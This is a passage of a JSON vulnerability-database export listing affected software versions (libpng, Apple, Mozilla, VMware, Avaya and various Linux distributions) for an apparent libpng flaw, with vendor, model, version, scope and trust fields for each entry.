"vendor": "libpng",
"version": "1.0.40"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.41"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.29"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.30"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.3"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6"
},
{
"_id": null,
"model": "linux hppa",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux enterprise sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.25"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.42"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.1"
},
{
"_id": null,
"model": "linux enterprise sdk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "tv",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.2"
},
{
"_id": null,
"model": "intuity audix",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "in motion blackberry enterprise server for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.1"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.1"
},
{
"_id": null,
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "9.0.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.2.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.16"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.18"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"_id": null,
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"_id": null,
"model": "messaging storage server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.7"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0"
},
{
"_id": null,
"model": "beta01",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.27"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.2"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0.2"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2"
},
{
"_id": null,
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.4"
},
{
"_id": null,
"model": "ipod touch",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "workstation build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5118166"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.2"
},
{
"_id": null,
"model": "cms server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "15.0"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"_id": null,
"model": "ipod touch",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.1.1"
},
{
"_id": null,
"model": "player build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5118166"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.21"
},
{
"_id": null,
"model": "ipad",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2.1"
},
{
"_id": null,
"model": "solaris express",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "11"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
"_id": null,
"model": "tv",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.0"
},
{
"_id": null,
"model": "ipod touch",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.1.3"
},
{
"_id": null,
"model": "itunes",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "10.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.36"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.9"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.1"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.6"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.2"
},
{
"_id": null,
"model": "in motion blackberry enterprise server express for exchange mr1",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.2"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.2"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1"
},
{
"_id": null,
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "9.1"
},
{
"_id": null,
"model": "linux enterprise desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"_id": null,
"model": "player build",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": "3.1.2301548"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.0"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.3"
},
{
"_id": null,
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.1"
},
{
"_id": null,
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.9156507"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"_id": null,
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "9.2.1"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.18"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for novell groupwise",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.1"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.1.3"
},
{
"_id": null,
"model": "ir",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "message networking mn",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1.3"
},
{
"_id": null,
"model": "tv",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "4.1"
},
{
"_id": null,
"model": "linux enterprise sdk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.5"
},
{
"_id": null,
"model": "coat systems proxyav",
"scope": "ne",
"trust": 0.3,
"vendor": "blue",
"version": "3.4.1.1"
},
{
"_id": null,
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "beta01",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "beta19",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"_id": null,
"model": "workstation build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.2156735"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.1"
},
{
"_id": null,
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.15"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
"_id": null,
"model": "aura system platform sp1.1",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.0"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.0"
},
{
"_id": null,
"model": "firefox",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.7"
},
{
"_id": null,
"model": "hat enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "3"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.2"
},
{
"_id": null,
"model": "firefox",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.11"
},
{
"_id": null,
"model": "linux armel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "safari for windows",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.4"
},
{
"_id": null,
"model": "player build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.4246459"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.1"
},
{
"_id": null,
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.1"
},
{
"_id": null,
"model": "ir",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"_id": null,
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "ipod touch",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.2.1"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "ipad",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2.2"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.7"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.2"
},
{
"_id": null,
"model": "corporate server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "12.2"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2.1"
},
{
"_id": null,
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "linux enterprise sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.8"
},
{
"_id": null,
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.2"
},
{
"_id": null,
"model": "intuity audix lx sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "ipod touch",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.13"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.10"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1.2"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "ipod touch",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.1.2"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"_id": null,
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "messaging storage server",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2008.0"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0.1"
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "0"
},
{
"_id": null,
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "cms server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "16.0"
},
{
"_id": null,
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11.4"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.20"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0"
},
{
"_id": null,
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.14"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "8.1"
},
{
"_id": null,
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.10203137"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "12.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.12"
},
{
"_id": null,
"model": "intuity lx",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.8"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.27"
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.1"
},
{
"_id": null,
"model": "corporate server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"_id": null,
"model": "linux enterprise sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "9.0.2"
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.2"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for exchange mr2",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.3"
},
{
"_id": null,
"model": "enterprise linux desktop version",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.0.2"
},
{
"_id": null,
"model": "solaris 10 sparc",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "9.1"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.4"
},
{
"_id": null,
"model": "iphone",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.1.2"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.4"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"_id": null,
"model": "player build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.3185404"
},
{
"_id": null,
"model": "workstation build",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": "7.1.2301548"
},
{
"_id": null,
"model": "linux alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux enterprise server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.4"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.10"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for novell groupwise",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "4.1.7"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.2"
},
{
"_id": null,
"model": "in motion blackberry enterprise server for domino mr3",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.3"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.5"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0.3"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.3"
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.3"
},
{
"_id": null,
"model": "in motion blackberry enterprise server express for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "0.90"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "pardus",
"version": "20090"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.2"
},
{
"_id": null,
"model": "safari for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.3"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2.1"
},
{
"_id": null,
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.3"
},
{
"_id": null,
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "9.0"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.1"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4"
},
{
"_id": null,
"model": "aura session manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.26"
},
{
"_id": null,
"model": "linux x86 64 -current",
"scope": null,
"trust": 0.3,
"vendor": "slackware",
"version": null
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"_id": null,
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.2"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.8126538"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.24"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4"
},
{
"_id": null,
"model": "thunderbird",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.6"
},
{
"_id": null,
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "9.0.1.8"
},
{
"_id": null,
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.43"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "9.0"
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0.2"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "ipod touch",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.2"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.1"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.3"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "in motion blackberry enterprise server express for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "research",
"version": "5.0.3"
},
{
"_id": null,
"model": "hat enterprise linux desktop client",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "5"
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.0.4"
},
{
"_id": null,
"model": "firefox",
